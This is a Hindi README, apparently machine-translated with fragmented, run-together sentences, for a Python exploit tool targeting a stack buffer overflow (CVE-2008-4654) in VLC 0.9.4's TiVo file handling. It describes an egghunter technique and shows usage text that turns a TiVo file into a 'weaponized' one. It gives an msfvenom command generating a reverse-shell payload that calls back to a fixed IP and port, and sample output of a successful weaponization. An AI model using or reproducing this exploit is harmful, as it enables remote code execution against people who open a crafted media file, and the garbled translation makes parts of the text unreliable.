
VideoLan के VLC Media Player 0.9.4 में TiVo फ़ाइलों को प्रोसेस करते समय होने वाली स्टैक-आधारित बफर ओवरफ़्लो भेद्यता के लिए एक पूर्णतः कार्यशील शोषण।
VideoLan के VLC मीडिया प्लेयर 0.9.4 में TiVo फ़ाइलों को संसाधित करते समय स्टैक-आधारित बफर ओवरफ्लो भेद्यता CVE-2008-4654 के लिए एक पूर्णतः कार्यात्मक शोषण। यह 64-बिट विंडोज सिस्टम पर चलने वाली 32-बिट बाइनरी को लक्षित करता है और सीमित स्टैक स्पेस को बायपास करने के लिए WOW64 एगहंटर का उपयोग करता है।
स्क्रिप्ट अपडेट करें:
buf = b'[...]' को अपने स्वयं के शेलकोड (जैसे, msfvenom से) से बदलें।EGG_HUNTER_WOW64 शेलकोड को समायोजित करें।python .\CVE-2008-4654.py --help
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
usage: CVE-2008-4654.py [-h] --input INPUT --output OUTPUT
Transform a given TiVo file into a weapon with predefined shellcode.
options:
-h, --help show this help message and exit
--input INPUT Path to the input TiVo file to be weaponized.
--output OUTPUT Path where the modified (weaponized) TiVo file will be saved.
TIVO_PES_FILEID) खोजती है।b"\x00\x00\x00\xff" से ओवरराइट करता है, जो सीमा से बाहर पढ़ने को सेट करता है जिससे स्टैक ओवरफ्लो होता है।TIVO_PES_FILEID के 92 बाइट्स बाद के किसी अन्य क्षेत्र को एक कस्टम पेलोड से बदल देता है।w00tw00t मार्कर के लिए मेमोरी स्कैन करता है।msfvenom -p windows/shell_reverse_tcp LHOST=192.168.10.150 LPORT=6666 -a x86 -f python -b '\x00'
buf = b'[...]' को बदलें।PS C:\ > python .\CVE-2008-4654.py --input .\test.ty --output .\hazard.ty
CVE-2008-4654 - VLC v0.9.4 Tivo Stack Buffer Overflow - by Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
[+] Found TIVO_PES_FILEID at offset 0x300000.
[+] Replaced 4 bytes at offset 0x300014 with 0x000000ff.
[+] Replaced 685 bytes at offset 0x30005c.
[+] Successfully weaponized: .\hazard.ty